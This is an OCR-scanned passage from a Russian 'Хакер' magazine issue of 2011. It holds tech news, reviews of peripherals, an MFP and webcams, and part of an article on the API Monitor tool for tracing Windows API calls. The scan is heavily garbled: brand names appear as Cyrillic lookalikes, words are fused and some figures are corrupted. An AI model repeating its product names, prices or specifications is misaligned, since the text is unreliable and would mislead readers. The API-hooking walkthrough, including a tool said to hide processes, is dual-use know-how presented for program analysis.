телефонов, которые без всяких вложений могли 
бы клеить метку ВІіпдТад кдевайсам прямо на 
заводе. 



► 012 
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КЛАВИАТУРА НА СОЛНЕЧНЫХ БАТАРЕЯХ 




Беспроводныеустройства — это, без сомнений, благо. Но давай 
честно — ведьты тоже регулярно забываешь зарядить и. 
поменять аккумуляторы в мыши или клавиатуре? В итоге 
девайс, конечно, отключается в самый неподходящий 
момент, напоминая о вселенском законе подлости. С 
новой клавиатурой К750 от компании ЦодйесН подоб- 
ные проблемы больше не будуттебя беспокоить. Эта 
беспроводная клавиатура работает от солнечных 
батарей! Для подзарядки устройству вполне хватает 
света, который обычно есть в помещениях. Разуме- 
ется, встроенный аккумулятору К750 тоже имеется 
(какиначе работать в темноте?) и, позаверениям 
разработчиков, одного полного заряда должно хватить 
на три месяца работы в абсолютной темноте. Еще одним 
плюсом устройства является компактность — толщина 
клавиатуры не превышаете мм. Для связи с ПК используется 
радиоканал на частоте 2.4 ГГц с шифрованием по алгоритму АЕ5 
со 1 28-битным ключом (приемник БодКесЬ ІІпіІуіпд входит в комплект). 
Цена этой интересной новинки составляет $80, и она уже появилась 
на прилавках магазинов СШАи Европы, такчто можешь сделать себе 
оригинальный новогодний подарок :). 



> «Корпорация добра» боодіе теперь готова выплатить вознаграждение 
не только за баги, найденные в браузере СІігоше. Отныне оплачиваются 
и уязвимости, найденные на ресурсах компании: ѴоиТиЬе, Огкиі, Віоддег, 
боодіе Оосз и бтаіі. Размер вознаграждения варьируется от $500 до $3133.7. 



МЫШЬ, ДОСТОЙНАЯ БЕТМАНА 




Еслитебе по душе необычные, функциональные и удобные 
манипуляторы, то мышьСубогд Р. А.' Т.9 от компании МасІ 
Са1:2 не оставиттебя равнодушным. Беспроводная новинка 
продолжает геймерскую серию Р.А.Т. и без, преувеличения, 
является ее украшением. Технические данные девайса 
удовлетворят почти любого современного игрока: регули- 
руемое разрешение от 25 до 5600 точек надюймсшагом 
в 25 единиц. Приемник, работающий на частоте 2.4 ГГц 
(задержка не превышает 1 мс). Частота опроса достигает 
1000 Гц, а максимальная скорость перемещения, которую 
способна отслеживать оптическая система, составляетб 
м/с. Но самая интересная особенностьдевайса заключается 
втом, что почти все его физические характеристики можно 
менять«под себя». Настраивается буквально все: ширина, 
высота, длина корпуса и, уже традиционно для такого рода 
устройств, масса. Последняя регулируется при помощи 
пяти грузиков массой 6 г каждый. Крометого, СуЬогд Р.А.Т.9 
комплектуется настольным зарядным устройством, где и 
хранятся грузы. Кстати, каждой из двух литиево-ионных 
батарей мышки хватит на 9 часов активной игры или на 4 
дня обычного использования. В качестве заключительного 
штриха позволь добавить, что корпус СуЬогд Р.А.Т.9 оснащен 
металлическими шасси и 5-ю программируемыми кнопками. 
Описывать безумный футуристический дизайн новинки мы 
не будем, вместо этого предлагаем тебе «один раз увидеть», 
посмотрев на иллюстрацию. Цена гаджета — $1 50. 



ХАКЕР 01 (144) 201 1 



► 013 



МЕ0АЫЕШ5 



800 0ПАЫШ 




Похоже, компании 2аІтап сталотесно в 
привычной для нее сфере систем охлаж- 
дения и корпусов и она решила наладить 
выпуск собственных 500-накопителей. Пока 
за планировано и анонсировано две линей- 
ки: 5-5егіез и КІ-Зегіез. Причем решения 
в первой линейке будут построены на базе 
контроллера ЗапсІРогсе, а в основе 550 из 
семейства 5-5егіез окажется контроллер от 
Лѵіісгоп. Все готовящиеся к релизутвердо- 
тельныедиски 2аІтап будут выполнены в 
форм-факторе 2,5 дюйма в корпусе из аноди- 
рованного алюминия и оснащены интер- 
фейсом подключения 5АТА3.0 6Ьрз, а также 
поддержкой команды ТР I М в ОС ѴѴі псіоѵѵз 7. 

В серии 5 будет представлено три модели 
емкостью 32, 64 и 1 28 ГБ, со скоростью чтения 
260 Мбит/с. Скорость записи, в отличие от 
скорости чтения, варьируется: 60 МБ/с для 
младшей модели, 120 МБ/с для средней и 
210 МБ/сдля старшей модели. N серия будет 
представлена двумя девайсами объемом 64 



и 1 28 ГБ, но максимальная скорость чтения и 
записи для нее составит уже до 280 и 270 МБ/с 
соответственно. Известны и цены. Стоимость 



младшей 32-ГБ модели в 5-линейке — $99.99, 
самый большой и быстрый накопитель из 
Ы-серии обойдется в $289.99. 



> $100 000 предложила компания МісгозоК разработчикам игры Ріапіз 
Ѵ$. 2отЬіе$ за портирование их игры на платформу ѴѴіпііоѵѵз РИопе 7. 
Они отказались. 

МАСВ00К АІК СТАЛ ЕЩЕ ТОНЬШЕ 



Очередную долгожданную новинку выпус- 
тила компания Арріе — в продажу поступили 
обновленные ноутбуки МасВоокАіг. Согласно 
пресс-релизу, Аігтеперь «представляет собой 
первый ноутбук нового поколения с переходом 
от механическихжестких дисков и оптических 
приводов к полупроводниковым флэш -нако- 
пителям и интернет-сервисам». Работает все 
это в 2 раза быстрее, а места занимает меньше, 
такчто МасВоок Аігеще немного«похудел»: 
размеры лэптопа теперь составляют 0.28 см в 
самомузком месте и не превышают 1 ,7см в са- 
мом широком. Моделей, кстати, две: старшая с 
13.3-дюймовым экраном (разрешение 1440x900 
точек] и младшая сэкраном 1 1.6" (разрешение 
1366х768точек]. Конфигурация 13.3-дюймовой 
модели такова: ІпІеІСоге 2 Оио 1 .86 ГГц, 2 ГБ 
ОЗУ, полупроводниковые флэш-накопители на 
128 Гб или 256 Гб и графическая система ІЧѴЮІА 
ОеГогсе320М с 256 МБ памяти СОР35СРАМ. 
Младший 1 1 -дюймовый ноутбук чуть скромнее: 

I пііеі Соге 2 Оио 1 .4 ГГц, 2 ГБ ОЗУ, полупровод- 
никовые флэш-накопители объемом 64 ГБ или 
128 ГБ. Опция сборки по заказу включает более 
быстрые процессоры, 4 Гб ОЗУ и дополнитель- 
ные аксессуары. При всех перечисленныхдо- 
стоинствах ноутбуки также оснащаются полно- 



размерной клавиатурой, стеклянным треки адом 
МиШ-ТоисЬ, камерой ГасеТіте, микрофоном и 
стереодинамикам. Поддержка беспроводных 
сетей представлена в виде АігРогІ Ехігете 
ѴѴі- Гі (802.1 1 п] и Віиеіооіб 2.1 + БОР. Приятно 
ито, что цены на самыетонкие «яблочные» 
ноуты снизились:теперь цена начинается от 
$999 за базовую 1 1 . 6-дюймовую комплектацию 
(естественно, это цена в Штатах]. Стоимость же 
13.3-дюймового МасВоок Аігстартуетс $1299. 
Однако праздникмаководов был немно- 
го подпорчен сообщениями о возможных 
дефектах системной платы, которыми Арріе 




якобы пренебрег. Дело втом, чтоу некоторых 
из пользователей, приобретших 1 1 -дюймовую 
модель, происходят сбои в работе системы 
вообще и графической подсистемы в частности. 
Растерянные юзеры наблюдают на экране своих 
«Маков» всевозможные артефакты (вертикаль- 
ные и горизонтальные полосы, искаженные 
цвета], сопровождаемые остановками работы 
операционной системы. Арріе уже выпусти- 
ла обновление ПО, призванноеустранить 
проблемы в работе графической подсистемы, 
однако оно помогает не всем — у многих глюки 
не исчезают. 




г 
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ЗАМЗІМ6 

5СХ-4600 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 

СКОРОСТЬ ПЕЧАТИ, СТР/МИН: 22 
ВРЕМЯ ВЫХОДА ПЕРВОЙ СТРАНИЦЫ, С: 1 0 
РАЗРЕШЕНИЕ ПЕЧАТИ: 1 200X1 200 
СКОРОСТЬ КОПИРОВАНИЯ, СТР/МИН: 22 
ОПТИЧЕСКОЕ РАЗРЕШЕНИЕ СКАНЕРА: 1 200X1 200 
ВХОДНОЙ ЛОТОК, Л: 250 
ПАМЯТЬ, МБ: 64 
ПРОЦЕССОР, МГЦ: 360 
ГАБАРИТЫ, ММ: 41 6X409X275.8 
ВЕС, КГ: 10.69 





Пока человечес- 
тво не перевело 
всю информацию 
в цифровой вид 
и не встроило 
в себя разъемы 
для ее восприятия, 
анализа и передачи, нам придется 
выводить нужные данные с мониторов на 
бумагу. Ачем информации больше, тем чаще, видимо, 
эта операция будет осуществляться. Также, впрочем, каки 
обратная ей, то есть перевод данных в цифровую форму для последую- 
щего использования. В общем, без МФУ сегодня не обойтись. Особенно 
лазерного, чтобы быстро, недорого и качественно выполняло свою работу. 
Таких сегодня довольно много на рынке, поэтому проблема заключается 
втом, чтобы сделать правильный выбор. Мы протестировали монохром- 
ное МФУ с возможностью цветного сканирования Эатзипд 5СХ-4600 и 
пришли квыводу, что оно станет отличным помощником для всех, кому 
нужны услуги посредника по переводу данных из цифровой в аналоговую 
формуй наоборот. 




Начало работы 



Устройство выполнено в массивном и тяжелом корпусетемного цвета, 
благодаря чему выглядитоно весьма и весьма стильно, хоть и места 
на столе займет немало. На переднюю панель вынесены индикаторы, 
клавиши управления и небольшой ЖК-дисплей, что также добавляет 
Эатзипд 5СХ-4600 шарма. Вообще, общаться с принтером через его 
панельуправления, а не через средства компьютера, оченьудобно, чему 
во многом способствуютдвухстрочный экран и так называемая навигаци- 
онная клавиша: на мониторе отображается текущее состояние устройства 
и другая полезная информация, а большой нави-кнопкой всемлегко и 
просто командовать. 

С МФУ поставляется весьма удобное и простое в использовании про- 
граммное обеспечение. Кстати, установка устройства также не вызывает 
никаких проблем изанимаетминимум времени. Этот комбайн обладает 
вместительными лотками для бумаги, есть в нем и возможность ручной 
подачи по одному листу. Когда наступитмоментсмены тонера, то ты смо- 
жешьосуществитьэтуоперациюоченьлегко и просто-тутвсе продумано. 



Функциональные возмож- 
ности устройства выходят 
довольно далеко за рамки 
простого трио печать-копирование- 
сканирование благодаря различным до- 
полнительным опциям. Например, функция 
АпуРгіпІ, реализуемая с помощью прилагаемого 
ПО, позволяетскомпоновать из понравившихся 
элементов веб-страниц свой коллаж и распечатать его, 
действуя исключительно мышкой и не прибегая к помощи фоторедакто- 
ра. Крометого, их можно просто сохранить в виде графического файла. 
Другой полезной и интересной функцией является возможность распе- 
чатать содержимое экрана нажатием одной клавиши на корпусе МФУ. 
Естественно, это касается итого контента, который создан с помощью 
АпуРгіпі Какты понимаешь, с помощью этой функции можно упростить 
свою работу и увеличить скорость выполнения многих операций, тем 
более, что можно выбирать- печататьли весьэкран, либотолькото 
окно, которое активно вданный момент. Естьи несколько специальных 
режимов, которые будут интересны владельцам домашних офисов: 
копирование на один лист двух сторон удостоверения, печать несколь- 
ких экземпляров документа на одном листе, копирование плакатов итак 
далее. 

После того, как мы рассказали тебе о том, что может печатать это 
устройство, тебе наверняка интересно, как быстро и с каким качеством 
оно это делает. Тут тоже все в порядке: 10 нашихтестовых страниц, 
состоящих из наиболее часто использующихся элементов (текст разного 
шрифта и кегля, таблица, диаграмма, картинка] Эатзипд 5СХ-4600 
напечатал за 38 секунд, а на создание одной копии он потратил 9 секунд. 
Все было пропечатано четко и насыщенным черным, артефактов заме- 
чено не было. 



Итоги 



МФУЭатзипд 5СХ-4600 будет достойным помощником какдля школь- 
ника или студента, так и для владельца домашнего офиса. Все, что для 
этого нужно, у это го устройства имеется. ЗС 
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СПИСОК 

ТЕСТИРУЕМОГО 

ОБОРУДОВАНИЯ 

САШМ С№-ѴѴСАМ820 
СКЕАТІѴЕ ИѴЕІСАМ ОРТІААР 
СЕИіиЗ ІЗИМ 2020АР 
Ю6ІТЕСН С600 
Ю6ІТЕСН ОІЛСКСАМ 5РНЕРЕ 
МІСР050РТ ИРЕСАМ ѴХ-5500 



КОМПЬЮТЕРНОЕ 

ОКО 

О СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ВЕБ-КАМЕР 



Вступление 

Для того, чтобы разнообразить свое общение по Интернету, нужно совсем 
немного, а именно — приобрести веб-камеру. Сегодня эти устройства 
оченьдоступны, также каки приличная скорость соединения, позво- 
ляющая передавать голос и видео со вполне приемлемым качеством. 
Проблема в выборе, но тут мы тебе поможем. 

Технологии 

Итак, для чего же, собственно, нам нужна веб-камера? Основным ее 
предназначением является передача картинки на компьютер, причем 
в реальном времени. Тутсразу нужно отметить, что передача изобра- 
жения высокой четкости через сеть в реальном времени — дело, пока, в 
общем-то, бесполезное, поэтому многомегапиксельная матрица особо 
веб-камере и не нужна. Разве что для создания фотографий, но на 
очень высокое качество картинки рассчитывать все равно не прихо- 
дится. Поэтому бывает и так, что картинку более высокого качества дает 
нета камера, у которой мегапикселей больше, а та, у которой их как раз 
меньше, зато сам размер матрицы больше. Он влияет на такие пара- 
метры, как цифровой шум (он меньше, если матрица больше] и качество 
работы в условиях недостатка света. Помимо качества картинки важно 
и то, каким образом происходит фокусировка изображения. Вариан- 
тов тут два — либо она автоматическая, либо на камере присутствует 
специальное колесико. Некоторые модели даже могут сами следитьза 
передвижением лица человека (или нескольких), находящегося перед 
компьютером! Но гладко это выглядиттолько на бумаге, а в жизни 
автофокусировка не всегда работает безупречно, особенно если света 
мало или выбран нестандартный ракурс, поэтому возможность ручной 



настройки тоже желательно иметь под рукой. Также матрица вкупе со 
светосилой оптики, установленной на камере, влияют на динамичес- 
кий диапазон — параметр, отвечающий за то, чтобы на изображении не 
было проблем со светлыми и темными участками (они могут выбиваться 
и проваливаться]. Все остальноеуже зависит от качества и возможнос- 
тей поставляемого вместе с камерой программного обеспечения. Это 
всевозможные аватарки, фильтры и эффекты, интеграция с сетевыми 
сервисами, быстрая отправка фоток по почте и многое другое. По сути, 
от софта зависит и быстрота, и правильность подстройки камеры под 
меняющийся свет, а также естественность цветопередачи и некоторые 
другие параметры. Так что не нужно думать, что ПО для камеры — это 
нечто не особо нужное. 

Методика тестирования 

Для начала мы внимательно смотрели на качество картинки, причем 
делали это при разных источниках света: при лампе накаливания и 
при люминесцентной лампе, в полутемной комнате и при дневном 
свете. Также мы смотрели и на то, как быстро и насколько четко камеры 
подстраиваются под изменение ситуации со светом. Искали мы и циф- 
ровой шум, который появляется при недостатке света. Не обошли мы 
вниманием и качество цветопередачи, скорость и корректность работы 
автофокуса и/или фокусировочного кольца. Понимая, что программное 
обеспечение к камере прикладывается не просто так, мы изучали и его 
возможности, которые могут включать в себя настройку различных па- 
раметров, удобный интерфейс, взаимодействие с Интернет-сервисами 
и забавные эффекты. 



► 016 
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Сапуоп 

СЫР-ѴѴСАМ820 






1 ѵеІСат Орііа аі 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП: 2,0 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 5,3 
ЧАСТОТА ВИДЕО, КАДР/С: 30 
ВСТРОЕННЫЙ МИКРОФОН: ДА 
ФОКУСИРОВКА: РУЧНАЯ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП: 2,0 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 7,7 
ЧАСТОТА ВИДЕО, КАДР/С: 30 
ВСТРОЕННЫЙ МИКРОФОН:ДА 
ФОКУСИРОВКА: АВТОМАТИЧЕСКАЯ 



□ □□ 



□ □□□ 



+ 

Веб-камера всегда на виду, и поэтому кее дизайну предъявляются весь- 
ма высокие требования. У изделия Сапуоп СІЧР-ѴѴСАМ820 с этим все в 
порядке: двухцветный (голубой с серебристым] симпатичный корпус, 
прозрачная подставка — в общем, стильное устройство, ничего не ска- 
жешь. Изображение камера создаетхорошее, особенно если учесть, что 
ее стоимость крайне невелика: цвета естественные, недостаток света 
выливается в минимальный шум, разве что задержка изображения ве- 
ликовата. Те шарниры, что соединяют саму камеру с подставкой, и зажим 
для крепления на экран сделаны на болтах, так что когда конструкция со 
временем разболтается, ее можно будет подтянуть. 



+ 

Синяя подсветка этой камеры всегда будет для тебя надежным маяком в 
темной комнате или на захламленном столе. Да и выглядитэто сим- 
патично. Вообще, внешний вид камеры нестандартен: этакий пово- 
рачивающийся в двух плоскостях скругленный цилиндр. Он не имеет 
кольца фокусировки, но камера оснащена автофокусом. Крометого, она 
обладает весьма впечатляющим показателем светосилы (Р/2,9), дающим 
возможность работать в интимном полумраке. Матрица также неплоха, 
у нее хорошая цветопередача и динамический диапазон. Порадовало 
идущее в комплекте ПО, с помощью которого, например, оченьлегко 
записать и разместить на ѴоиТиЬе свой видеоролик. 




Ксожалению, но вполне естественно, невысокая цена вылилась в чисто 
конструктивные недостатки и другие мелкие неудобства. Кабель 115В из 
комплекта поставки короткий, софт оттуда же не балует ни интерфейсом, 
ни возможностями. Оченьтяжело поворачивается фокусировочное 
кольцо, а крепящийся к подставке шарнир сделан из пластика, что в 
будущем принесет проблемы. 



Такое впечатление, что в отместку за свою функциональность установ- 
ка софта выполняется крайне коряво и неудобно. В процессе работы 
начинаешь скучать по кольцу фокусировки, потому что сам автофокус 
работает небыстро и не всегда точно. Если ты покупаешь эту камеру для 
общения целой компанией, то останешься доволен широкоугольностью 
объектива, но если ты одиночка, и твоя комната не всегда в армейском 
порядке, то это ее свойствотебе не понравится. 
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Іоайес 



Оепіиз іБІіт 
2020АР 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП: 2,0 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 8.5 
ЧАСТОТА ВИДЕО: 1 ,3 МП ДО 9 КАДР/С, 2 МП ДО 6 КАДР/С 
ВСТРОЕННЫЙ МИКРОФОН: ДА 
ФОКУСИРОВКА: АВТОМАТИЧЕСКАЯ 



ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП: 2,0 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 8,0 
ЧАСТОТА ВИДЕО. КАДР/С: 30 
ВСТРОЕННЫЙ МИКРОФОН:ДА 
ФОКУСИРОВКА: РУЧНАЯ 



□ 



иииииипппп 

+ 

На красно-черном корпусе этой камеры, который отличается стильнос- 
тью и миниатюрностью, расположена кнопка, по нажатию которой выле- 
тает птичка, то есть делается фотография. Камера крутится вокруг своей 
оси и вообще наклоняется во все стороны. Программное обеспечение из 
комплекта поставки предоставляеточень забавные возможности, такие 
как, например, фейс-морфинги анимированные аватарки, одевание 
масок, очков и накладывание прочих веселых эффектов. Автофокус 
работаеттак, что к нему нельзя предъявить каких-либо претензий. 

При работе в темноте изображение начинает сильно лагать, но даже 
если света достаточно, то на картинке заметны шумы. Вообще, качество 
изображения не очень высоко: картинка блеклая, хотя детализация 
неплоха. Не достает устройству и динамического диапазона. Автопод- 
стройка под освещенность происходите очень большими задержками. 



+ 

В данной камере очень интересна ее подставка, точнее, конструкция 
оной — крепиться устройство может практически на любую поверхность, 
от монитора до клавиатуры. На самом корпусе присутствует колесико 
фокусировки (причем сбоку, что весьма оригинально] и кнопка создания 
фотографий. Для тех, кто часто обижается на собеседника, предусмотре- 
на специальная шторка, закрывающая объектив: при этом твой визави 
будет видеть ранее выбранную тобой заставку. Качество изображения у 
этой камеры высокое, цвета естественные, как и динамический диапа- 
зон. Понравилась нам и простая процедура калибровки, нетребующая 
ручной установки точек, а также поставляемый софт, обладающий широ- 
кими возможностями: в частности, свое лицо можно заменить красивой 
трехмерной моделью. 

Вращение камеры возможно только в двух плоскостях, наклонить ее ни- 
куда не получится. При недостатке света начинают появляться заметные 
задержки в работе. 



► 018 
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МісгозоЙ ШеСат 
ѴХ-5500 



ЬоаНесЬ ОиіскСат 
Брпеге 




I 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП:2,0 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 8.0 
ЧАСТОТА ВИДЕО, КАДР/С: 30 
ВСТРОЕННЫЙ МИКРОФОН: ДА 
ФОКУСИРОВКА: АВТО 

■■■■■■■■■□ 

+ 

Уэтой камеры говорящее название: она состоит из пары сфер, постав- 
ленныхдругна друга. Сверху пластик прозрачен, и сквозьнего можно 
увидеть компоненты устройства и объектив. Следить за объективом 
весьма любопытно, особеннозатем, какой поворачивается в погонеза 
твоим отклонившимся лицом. Болеетого, слежение можно осуществлять 
и вручную с помощью прилагаемого ПО, а также настроить камерутак, 
чтобы она внимательно наблюдала нетолько за одним лицом в кадре, но 
и за несколькими. Крометого, вутилите имеется выбор фильтров и авата- 
рок, так что скучнотебе не будет. Изображение камера передаетхорошо, 
детализация неплоха, а задержки невелики, даже если света немного. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ФАКТИЧЕСКОЕ РАЗРЕШЕНИЕ, МП: 0,3 
РАЗРЕШЕНИЕ (ИНТЕРПОЛЯЦИЯ), МП: 1,3 
ЧАСТОТА ВИДЕО, КАДР/С: 30 
ВСТРОЕННЫЙ МИКРОФОН: ДА 
ФОКУСИРОВКА: АВТО 

■■■■■■■■■□ 

+ 

Если ты любишь менять окружающее тебя пространства в угоду настрое- 
нию, то сменные цветные панели для этой веб-камеры придутсятебе по 
вкусу. Хотя она и так выглядит неплохо — красный корпус, соединенный 
с кольцом -подставкой серебристого цвета. Благодаря своим небольшим 
габаритам, а также возможности складываться, ее можно везде носить с 
собой, не говоря ужо перемещении в сумке вместе с ноутбуком. И возить 
еессобой можно не зря, так как качество картинки она обеспечивает 
вполне приличное, имеет быстрый автофокус и шуструю подстройку под 
окружающий свет. Программное обеспечение этой камеры даеттебе 
возможность играть с разнообразными эффектами. 



Правда, автоподстройка при смене освещенности не всегда успевает 
вовремя. Камера стоит совсем недешево, не каждый решится на такие 
траты. Автоматическое слежение не всегда успеваетсправиться со 
своей работой. 



Невеликий динамический диапазон несколько портит весьма поло- 
жительное общее впечатление отэтой камеры. Крометого, несмотря 
на приличный выбор эффектов, настроек в программном обеспечении 
очень мало. 
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Правильный шпион за АРІ 



вызовами в систем 



© Отладчик и дизассемблер - это, безусловно, лучшие инструменты, 
чтобы посмотреть, как устроена какая-то программа изнутри. Но есть 
еще одно средство, которое быстро может дать картину того, что 
происходит внутри приложения, и как оно взаимодействует с 
операционной системой. Зто монитор АРІ-вызовов. 



Работа многих приложений и самой ѴѴіпсІоѵѵз во многом построена на 
системе РІ_І_, т.е. динамически загружаемых библиотек. Приложениями 
предоставляются сервисные АРІ-функции, с помощью которых они 
могут взаимодействовать с системой. Условно говоря, есть функции 
для чтения и записи в реестр, работы с файловой системой, сетевого 
взаимодействия и т.д. Фиксируя вызовы АРІ-функций, мы можем узнать 
многое о работе приложения. А перехват таких вызовов (и спуфинг 
результата их выполнения] позволяет обойти многие ограничения 
системы и делать с ней практически что угодно. 

Существует немало программ, которые мониторят обращения к АРІ- 
функциям. Взять хотя бы небезызвестные утилиты РедМоп и РіІеМоп 
Марка Руссиновича. Отслеживая вызовы АРІ-функций, касающихся 
взаимодействия с реестром и файловой системой, они выводят инфор- 
мацию в удобном для анализа виде. Фактически идея написать матери- 
ал о давно существовавших АРІ-шпионах появилась под впечатлением 
от нового релиза программы АРІ МопіФг. Она делает то же самое, что 
и масса других подобных программ — фиксирует обращения к АРІ- 
функциям и СОМ-методам. Но то, как она реализована, заслуживает 
всяческих похвал. 

Чем удивил АРІ МопіТог? 

Сам проект довольно старый: его предыдущая 1.5 версия выходила еще 
в далеком 2001 году. Прошлым летом разработчики реанимировали 



проект и полностью переписали код. Теперь это офигенный инструмент! 
Кратко пройдемся по его возможностям. 

• В первую очередь стоит отметить совершенно чумовой интерфейс, 
который отличается наглядностью и удобством. Чего стоит только 
подсветка синтаксиса в вызываемых функциях. В специальном поле 
«5иттагу», где отображается активность приложения, выводится 
информация о каждом вызове АРІ: идентификатор нити, название ВІ_І_, 
сделавшей вызов, а также подсвеченный синтаксис АРІ-вызова со 
всеми параметрами и возвращенным значением. Причем, если вызов 
не удался, информация об этом будет также наглядно отображена. 

• В программе по умолчанию включено описание 10 000 АРІ-функций 
из 166 ОиПек, а также 700 методов из более чем 600 СОМ-интерфейсов 
(включая 5ЬеІІ, Вгоѵѵзег, ОігесіЗЬоѵѵ, 0ігес1:5оипсІ, ОігесОС и т.д.]. Для 
большего удобства все АРІ организованы в категории и подкатегории 

в соответствии со структурой в библиотеке М50ІЧ. Специальное поле 
интерфейса «АРІ Саріиге РіКег» позволяет удобно выбрать те АРІ-шки, 
которые необходимо мониторить. Помимо этого, АРІ МопіЬг декодирует 
СІІЮ’ы, ]Ю’ы и РЕРІЮ’ы и приводит их в понятный, читаемый формат. 
Двойной клик по функции в любом месте программы откроет браузер с 
ее описанием на сайте М50ІЧ. 

• АРІ МопіФг может декодировать параметры функций и возвращае- 
мые значения, чтобы представить их в понятном формате. Это опять 
же заслуга внутренней базы. Функция СгеаіеРіІеѴѴ имеет параметр 



► 020 
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Выбираем функции для мониторинга 






б\л/5агеМосІе. Например, при создании файла блокнотом, 
оно имеет значение «1 », не сильно понятно, правда? Если 
включить декодирование (кликаем на название столбцов 
в поле «Рагатеіегз» и выбираем «Чесосіе Рагатеігез 
Ѵаіиез»), то АРІ Мопйог покажет уже понятное значение 
«РИЕ_5НАРЕ_РЕА0 I ЕІЕЕ_5НАРЕ_ѴѴРІТЕ". 

• С помощью АРІ-монитора ты можешь посмотреть как 
входящий, так и исходящий буферы. Причем количество 
данных, которое необходимо отображать пользователю, 
автоматически высчитывается, используя переданные 
АРІ-функции аргументы или возвращаемое значение. К 
примеру, у функции для чтения файла ПеабРіІе есть буфер 
ІрВи^ег — его размер автоматически определяется АРІ 
Мопйог’ом благодаря параметру ІрІМитЬегСЙВуІюзПеасІ 
(количество прочитанных байтов] после вызова функции. 
Поэтому, если посмотреть на содержание буфера (оно ото- 
бражается в специальном поле — Чех ВибЕег], то в нем мы 
увидим данные именно в том количестве, в котором были 
прочитаны приложением. В настройках, кстати, можно 
задать максимальное количество байт, которые программа 
будет перехватывать. 

• В поле Зиттагу не просто отображаются вызванные 
функции, но и строится дерево вызовов, показывающее 
иерархию АРІ-вызовов. Если одна из функций вызвала 
другую, это будет наглядно отображено в дереве. Еще одно 
важное поле программы — это Сай Зіаск, в котором ты 
можешь посмотреть стек вызовов. 

• Если АРІ вызов не удастся, прога вызывает соответствую- 
щие функции, чтобы получить дополнительную инфор- 
мацию об ошибке. Для этого поддерживаются функции 
СеіЕазіЕггог, СоттОІдЕхІепбебЕггог, ѴѴЗАОеіЕазіЕггог. В 
дополнение, программа преобразует значения ІМТ5ТАТІІ5 и 
НРЕ51ІЕТ в читаемый формат. Например, если ЫоіерасІ не 
смог выполнить функцию СгеаіеРіІе, то АРІ Мопйог выдаст 





Устанавливаем хук на РігеЬх 



и ошибку, и расшифровку. Например, такую — «5, отказано 
в доступе». 

• В новой версии АРІ Мопйог реализована полноценная 
поддержка 64-битных приложений. Фактически на сайте 
разработчика доступны версии для 32- и 64-битной плат- 
форм. Сразу хочу оговориться, что 32-битная вариация 
может быть использована только для мониторинга 32-бит- 
ных приложений. Даже если ты собираешься отслеживать 
вызовы 32-битного приложения под 64-битной редакцией 
ѴѴіпсІоѵѵз, тебе все равно нужна 32-битная версия АРІ 
Мопйог. 



Устанавливаем 
простои поок 

Впрочем, лучше всего ощутить все прелести АРІ Мопйог 
на практике. В общем случае необходимо указать мони- 
тору две вещи: функции для отслеживания и программы/ 
сервисы, которые предположительно будут их вызывать. 
Для примера возьмем простую ситуацию, когда необходимо 
отследить факт создания файла в системе. За это, в общем 
случае, отвечают АРІ-функции СгеаіеРіІеА, СгеаіеРіІеѴѴ и 
ЫЮгеаІеРіІе, вот их вызовы мы и будем мониторить. Их 
надо отметить в панели АРІ Саріиге РіЙег. Как я уже ска- 
зал, список возможных функций для мониторинга очень 
внушительный, и даже несмотря на их удачную группиров- 
ку, найти нужные элементы, не зная, где они находятся, 
довольно сложно. Поэтому не стесняемся воспользоваться 
поиском (СЕгІ-Р или меню «Есій РіпсІ»], отыскав все необ- 
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Программы для мониторинга 
АРІ-вызовов 



ѴѴіпАріОѵеггісіе 

Мощнейший АРІ-монитор от французских разработчиков, кото- 
рый может не только отслеживать вызовы АРІ, но и переопреде- 
лять функции. Например, исключить нужный процесс из списка 
процессов, которые отображаются в таскменеджере. 

кегЬегоз 

Шпион для отлова вызовов ѴѴіпАРІ -фун кци й . Утилита перехва- 
тывает не только АРІ, но и пользовательские функции, а также 
поддерживает плагины. Лог работы шпиона в виде текстового 
файла *.гер сохраняется в папке с исследуемым приложением. 

АРІ5ру32 

АРІ5ру32 — шпион за вызовами ѴѴіпАРІ. Программа может сле- 
дить за всеми процессами в системе одновременно, имея для 
этого специальный навороченный движок. 

\% /I V > > > , 

ходимое по ключевому слову СгеаІеЕіІе. С этого момента АРІ Мопііог 
будет нам сообщать о вызове этих функций. Осталось выбрать про- 
грамму. Это может быть уже существующий процесс, и в этом случае 
его достаточно выбрать в панели Риппіпд Ргосеззез, или же мы 
можем запустить приложение прямо из АРІ Мопііог'а. Выберем 
второй вариант. Переходим в «Рііе Ноок Ргосезз», выбираем в 
папке ѴѴі псіо\л/5 поіераб.ехе (для простоты примера возьмем обычный 
блокнот]. В качестве аргументов, которые передаются приложению, 
предлагаю указать какой-нибудь текстовый файл. Тогда программа 
сразу же попытается создать документ — а именно это нам и надо. 
Нажимаем «ОК». Запустившийся блокнот справедливо замечает, что 
указанный текстовый файл он не нашел, и предлагает создать его. 
Соглашаемся и смотрим в вывод АРІ Мопііог. На панели Эиттагуты 
должен увидеть список вызовов, которые были сделаны ІМоІерасГом. 
Сначала приложение вызвало функцию СгеаІіеРіІеѴѴ из библиотеки 
кегпе132.сШ, которая, в свою очередь, вызвала ІЧіСгеаІеЕіІе. Обрати 
внимание: текстовые параметры для наглядности выделены красным 
цветом. Также в выводе отражаются возвращаемое значение и коды 
ошибок. Функция ІЧіСгеаІеЕіІе не нашла файл и возращает «5ТАТІІ5_ 
0ЕиЕСТ_І\І0Т_Р01Л\Ю», а потому кегпе132.сІІІ вернула в N осіерасі 
